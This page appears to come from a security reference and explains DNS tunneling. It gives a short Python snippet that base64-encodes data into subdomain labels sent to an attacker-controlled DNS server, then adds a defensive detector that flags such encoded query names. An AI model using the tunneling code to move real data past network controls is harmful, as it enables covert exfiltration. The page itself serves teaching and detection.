(Python) DNS Tunneling by Thomas Roccia
Created on Tuesday 13 December 2022. Updated 12 months ago.
This code uses the base64, dnslib and socket modules to encode the specified data as a base64 string and send it as a DNS query to the specified DNS server. The DNS query uses the domain name and subdomain that the attacker controls, with the encoded data as the subdomain label. The code then receives a DNS response from the server, decodes the data payload, and prints it.
```python
import base64
import socket

import dnslib

# Replace with the IP address of the DNS server
dns_server = "188.8.131.52"

# Replace with the domain name and subdomain that you control
domain_name = "example.com"
subdomain = "tunnel"

# Replace with the data that you want to transfer
data = b"hello"

# Encode the data as a base64 string
encoded_data = base64.b64encode(data).decode("ascii")

# Create a DNS query with the encoded data as the subdomain label
query = dnslib.DNSRecord.question(encoded_data + "." + subdomain + "." + domain_name)

# Send the DNS query to the DNS server
dns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
dns_socket.sendto(query.pack(), (dns_server, 53))

# Receive the DNS response from the DNS server
response = dnslib.DNSRecord.parse(dns_socket.recv(4096))

# Decode the DNS response and extract the data payload.
# response.rr is a list of answer records. This assumes the first answer's
# rdata is a name (for example a CNAME) whose first label is the base64
# payload; the page does not specify the response record type.
decoded_data = base64.b64decode(response.rr[0].rdata.label.label[0])

# Print the decoded data
print(decoded_data)
```
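A defender's view of the same traffic, as an added example that is not part of the original snippet: it flags query names whose leftmost label is canonical base64, as produced by the snippet's `base64.b64encode` step, and reports parent names that receive several distinct encoded labels. The function names, thresholds and sample query names are assumptions constructed for illustration, and the parent name is simply taken as everything after the first label.

```python
import base64
import binascii
import math
from collections import Counter, defaultdict

def entropy(text):
    """Shannon entropy of the label in bits per character."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())

def is_encoded_label(label, min_len=8, min_entropy=2.5):
    """True when a label is canonical base64 and not an ordinary hostname."""
    if len(label) < min_len or len(label) % 4:
        return False
    try:
        raw = base64.b64decode(label, validate=True)  # rejects non-alphabet chars
    except (binascii.Error, ValueError):
        return False
    if base64.b64encode(raw).decode() != label:
        return False
    # Hostnames are lowercase letters, digits and hyphens; base64 output mixes
    # case and may carry '+', '/' or '=' padding.
    unusual = label != label.lower() or any(ch in "+/=" for ch in label)
    return unusual and entropy(label) >= min_entropy

def find_tunnel_parents(qnames, min_hits=3):
    """Group encoded first labels by parent name; report parents with many."""
    hits = defaultdict(set)
    for qname in qnames:
        first, _, parent = qname.rstrip(".").partition(".")
        if parent and is_encoded_label(first):
            hits[parent.lower()].add(first)
    return {p: sorted(l) for p, l in hits.items() if len(l) >= min_hits}

# Constructed sample query names (not captured traffic).
SAMPLE_QNAMES = [
    "aGVsbG8=.tunnel.example.com.",
    "d29ybGQh.tunnel.example.com.",
    "Y2h1bmsz.tunnel.example.com.",
    "www.example.org.",
    "download.example.net.",
    "mail2024.example.org.",
    "UGF5bG9hZA==.cdn.example.net.",
]

if __name__ == "__main__":
    for parent, labels in find_tunnel_parents(SAMPLE_QNAMES).items():
        print(parent, labels)
```

The mixed-case signal is lost if the log source lowercases query names, in which case the per-parent count of distinct long labels is the signal to keep.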